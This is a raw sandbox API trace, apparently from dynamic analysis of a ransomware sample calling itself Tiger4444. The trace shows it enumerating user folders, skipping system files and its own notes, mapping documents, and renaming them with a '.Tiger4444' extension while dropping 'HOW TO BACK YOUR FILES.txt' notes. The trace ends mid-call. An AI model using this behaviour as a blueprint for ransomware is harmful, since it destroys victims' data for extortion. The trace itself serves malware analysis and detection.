lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x533e73a0, ftCreationTime.dwHighDateTime=0x1d4d252, ftLastAccessTime.dwLowDateTime=0xd6e45c60, ftLastAccessTime.dwHighDateTime=0x1d4d225, ftLastWriteTime.dwLowDateTime=0xd6e45c60, ftLastWriteTime.dwHighDateTime=0x1d4d225, nFileSizeHigh=0x0, nFileSizeLow=0x12223, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_VM7P01h9hZnAJlar.odt", cAlternateFileName="_VM7P0~1.ODT")) returned 1 [0046.608] lstrcmpiW (lpString1="_VM7P01h9hZnAJlar.odt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.608] lstrcmpiW (lpString1="_VM7P01h9hZnAJlar.odt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.608] lstrcmpiW (lpString1="_VM7P01h9hZnAJlar.odt", lpString2="Tiger4444.exe") returned -1 [0046.608] lstrcmpiW (lpString1="_VM7P01h9hZnAJlar.odt", lpString2=".") returned 1 [0046.608] lstrcmpiW (lpString1="_VM7P01h9hZnAJlar.odt", lpString2="..") returned 1 [0046.609] lstrcmpiW (lpString1="_VM7P01h9hZnAJlar.odt", lpString2="windows") returned -1 [0046.609] lstrcmpiW (lpString1="_VM7P01h9hZnAJlar.odt", lpString2="bootmgr") returned -1 [0046.609] lstrcmpiW (lpString1="_VM7P01h9hZnAJlar.odt", lpString2="pagefile.sys") returned -1 [0046.609] lstrcmpiW (lpString1="_VM7P01h9hZnAJlar.odt", lpString2="boot") returned -1 [0046.609] lstrcmpiW (lpString1="_VM7P01h9hZnAJlar.odt", lpString2="ids.txt") returned -1 [0046.609] lstrcmpiW (lpString1="_VM7P01h9hZnAJlar.odt", lpString2="NTUSER.DAT") returned -1 [0046.609] lstrcpyW (in: lpString1=0x30aeadc, lpString2="_VM7P01h9hZnAJlar.odt" | out: lpString1="_VM7P01h9hZnAJlar.odt") returned="_VM7P01h9hZnAJlar.odt" [0046.609] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\_VM7P01h9hZnAJlar.odt", dwFileAttributes=0x0) returned 1 [0046.609] lstrlenW (lpString="_VM7P01h9hZnAJlar.odt") returned 21 [0046.609] lstrlenW (lpString="Tiger4444") returned 9 [0046.609] lstrcmpiW (lpString1="AJlar.odt", lpString2="Tiger4444") returned -1 [0046.609] lstrlenW (lpString=".dll") returned 4 [0046.609] lstrcmpiW (lpString1=".odt", lpString2=".dll") returned 1 [0046.609] lstrlenW (lpString=".lnk") returned 4 [0046.609] lstrcmpiW (lpString1=".odt", lpString2=".lnk") returned 1 [0046.609] lstrlenW (lpString=".ini") returned 4 [0046.609] lstrcmpiW (lpString1=".odt", lpString2=".ini") returned 1 [0046.609] lstrlenW (lpString=".sys") returned 4 [0046.609] lstrcmpiW (lpString1=".odt", lpString2=".sys") returned -1 [0046.609] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\_VM7P01h9hZnAJlar.odt" (normalized: "c:\\users\\fd1hvy\\documents\\_vm7p01h9hznajlar.odt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.609] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.609] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13806257737) returned 1 [0046.610] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=74275) returned 1 [0046.610] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0046.610] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0046.610] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12530, lpName=0x0) returned 0x2c8 [0046.610] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12530) returned 0xbe0000 [0046.611] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.611] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0046.611] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.611] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0046.611] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.612] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0046.612] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.612] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0046.612] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13806474718) returned 1 [0046.612] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0046.612] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0046.612] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.612] CloseHandle (hObject=0x2c8) returned 1 [0046.613] CloseHandle (hObject=0x260) returned 1 [0046.613] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\_VM7P01h9hZnAJlar.odt.Tiger4444") returned 57 [0046.613] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\_VM7P01h9hZnAJlar.odt" (normalized: "c:\\users\\fd1hvy\\documents\\_vm7p01h9hznajlar.odt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\_VM7P01h9hZnAJlar.odt.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\_vm7p01h9hznajlar.odt.tiger4444"), dwFlags=0x1) returned 1 [0046.613] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=74288 | out: Addend=0xc6f980) returned 21628656 [0046.613] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4778 [0046.614] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x533e73a0, ftCreationTime.dwHighDateTime=0x1d4d252, ftLastAccessTime.dwLowDateTime=0xd6e45c60, ftLastAccessTime.dwHighDateTime=0x1d4d225, ftLastWriteTime.dwLowDateTime=0xd6e45c60, ftLastWriteTime.dwHighDateTime=0x1d4d225, nFileSizeHigh=0x0, nFileSizeLow=0x12223, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_VM7P01h9hZnAJlar.odt", cAlternateFileName="_VM7P0~1.ODT")) returned 0 [0046.614] FindClose (in: hFindFile=0xc72e48 | out: hFindFile=0xc72e48) returned 1 [0046.614] lstrcpyW (in: lpString1=0x30aeadc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0046.614] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0046.616] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0046.616] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0046.617] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.617] CloseHandle (hObject=0x260) returned 1 [0046.617] CloseHandle (hObject=0x2ac) returned 1 [0046.617] GetCurrentThreadId () returned 0xfa8 [0046.617] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66528 [0046.617] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Documents\\Outlook Files", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\Outlook Files") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files" [0046.617] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5e610 | out: hHeap=0xc50000) returned 1 [0046.617] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66520 | out: hHeap=0xc50000) returned 1 [0046.617] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\Outlook Files" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\Outlook Files") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files" [0046.617] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\" [0046.617] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\.BFC0E91B00AE8A0620D3" [0046.617] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0046.618] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0046.624] FlushFileBuffers (hFile=0x2ac) returned 1 [0046.723] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0046.723] CloseHandle (hObject=0x2ac) returned 1 [0046.723] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\Outlook Files") returned 39 [0046.723] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.724] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xddc1fe1e, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x80cd510d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72ec8 [0046.724] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.724] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.724] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0046.724] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0046.724] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xddc1fe1e, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x80cd510d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.724] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.724] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.724] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0046.724] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0046.724] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0046.724] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x80cd510d, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x80cd510d, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x80cfb127, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0046.724] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.724] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0046.724] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xddbf9d33, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kkcie@kdj.kd.pst", cAlternateFileName="KKCIE@~1.PST")) returned 1 [0046.724] lstrcmpiW (lpString1="kkcie@kdj.kd.pst", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.724] lstrcmpiW (lpString1="kkcie@kdj.kd.pst", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.724] lstrcmpiW (lpString1="kkcie@kdj.kd.pst", lpString2="Tiger4444.exe") returned -1 [0046.724] lstrcmpiW (lpString1="kkcie@kdj.kd.pst", lpString2=".") returned 1 [0046.724] lstrcmpiW (lpString1="kkcie@kdj.kd.pst", lpString2="..") returned 1 [0046.724] lstrcmpiW (lpString1="kkcie@kdj.kd.pst", lpString2="windows") returned -1 [0046.724] lstrcmpiW (lpString1="kkcie@kdj.kd.pst", lpString2="bootmgr") returned 1 [0046.724] lstrcmpiW (lpString1="kkcie@kdj.kd.pst", lpString2="pagefile.sys") returned -1 [0046.724] lstrcmpiW (lpString1="kkcie@kdj.kd.pst", lpString2="boot") returned 1 [0046.724] lstrcmpiW (lpString1="kkcie@kdj.kd.pst", lpString2="ids.txt") returned 1 [0046.724] lstrcmpiW (lpString1="kkcie@kdj.kd.pst", lpString2="NTUSER.DAT") returned -1 [0046.724] lstrcpyW (in: lpString1=0x30aeaf8, lpString2="kkcie@kdj.kd.pst" | out: lpString1="kkcie@kdj.kd.pst") returned="kkcie@kdj.kd.pst" [0046.724] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst", dwFileAttributes=0x2000) returned 1 [0046.725] lstrlenW (lpString="kkcie@kdj.kd.pst") returned 16 [0046.725] lstrlenW (lpString="Tiger4444") returned 9 [0046.725] lstrcmpiW (lpString1="dj.kd.pst", lpString2="Tiger4444") returned -1 [0046.725] lstrlenW (lpString=".dll") returned 4 [0046.725] lstrcmpiW (lpString1=".pst", lpString2=".dll") returned 1 [0046.725] lstrlenW (lpString=".lnk") returned 4 [0046.725] lstrcmpiW (lpString1=".pst", lpString2=".lnk") returned 1 [0046.725] lstrlenW (lpString=".ini") returned 4 [0046.725] lstrcmpiW (lpString1=".pst", lpString2=".ini") returned 1 [0046.725] lstrlenW (lpString=".sys") returned 4 [0046.725] lstrcmpiW (lpString1=".pst", lpString2=".sys") returned -1 [0046.725] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.725] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.725] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13817828029) returned 1 [0046.725] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=271360) returned 1 [0046.725] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0046.725] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0046.725] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x42700, lpName=0x0) returned 0x2c8 [0046.726] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x42700) returned 0xbe0000 [0046.766] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.766] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0046.766] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.766] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0046.766] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.766] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0046.766] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.766] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0046.766] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13821952791) returned 1 [0046.766] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0046.767] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0046.767] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.769] CloseHandle (hObject=0x2c8) returned 1 [0046.769] CloseHandle (hObject=0x260) returned 1 [0046.769] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst.Tiger4444") returned 66 [0046.769] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst.tiger4444"), dwFlags=0x1) returned 1 [0046.770] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=271360 | out: Addend=0xc6f980) returned 21702944 [0046.770] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=41 | out: Addend=0xc6f98c) returned 4780 [0046.770] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xddbf9d33, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kkcie@kdj.kd.pst", cAlternateFileName="KKCIE@~1.PST")) returned 0 [0046.770] FindClose (in: hFindFile=0xc72ec8 | out: hFindFile=0xc72ec8) returned 1 [0046.770] lstrcpyW (in: lpString1=0x30aeaf8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0046.770] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0046.772] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0046.772] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0046.773] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.773] CloseHandle (hObject=0x260) returned 1 [0046.773] CloseHandle (hObject=0x2ac) returned 1 [0046.773] GetCurrentThreadId () returned 0xfa8 [0046.773] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66668 [0046.773] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Documents\\My Shapes", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes") returned="C:\\Users\\FD1HVy\\Documents\\My Shapes" [0046.773] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7b288 | out: hHeap=0xc50000) returned 1 [0046.773] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66660 | out: hHeap=0xc50000) returned 1 [0046.773] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\My Shapes" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes") returned="C:\\Users\\FD1HVy\\Documents\\My Shapes" [0046.773] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes\\") returned="C:\\Users\\FD1HVy\\Documents\\My Shapes\\" [0046.773] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\My Shapes\\.BFC0E91B00AE8A0620D3" [0046.774] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0046.776] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0046.778] FlushFileBuffers (hFile=0x2ac) returned 1 [0046.785] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0046.785] CloseHandle (hObject=0x2ac) returned 1 [0046.786] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\My Shapes") returned 35 [0046.786] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.786] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0x80e5276d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73148 [0046.786] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.786] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.786] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0046.786] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0046.786] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0x80e5276d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.786] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.786] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.786] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0046.786] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0046.786] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0046.786] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x80e5276d, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x80e5276d, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x80e78893, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0046.786] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.786] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0046.786] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bea8c6, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0046.786] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.786] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.786] lstrcmpiW (lpString1="desktop.ini", 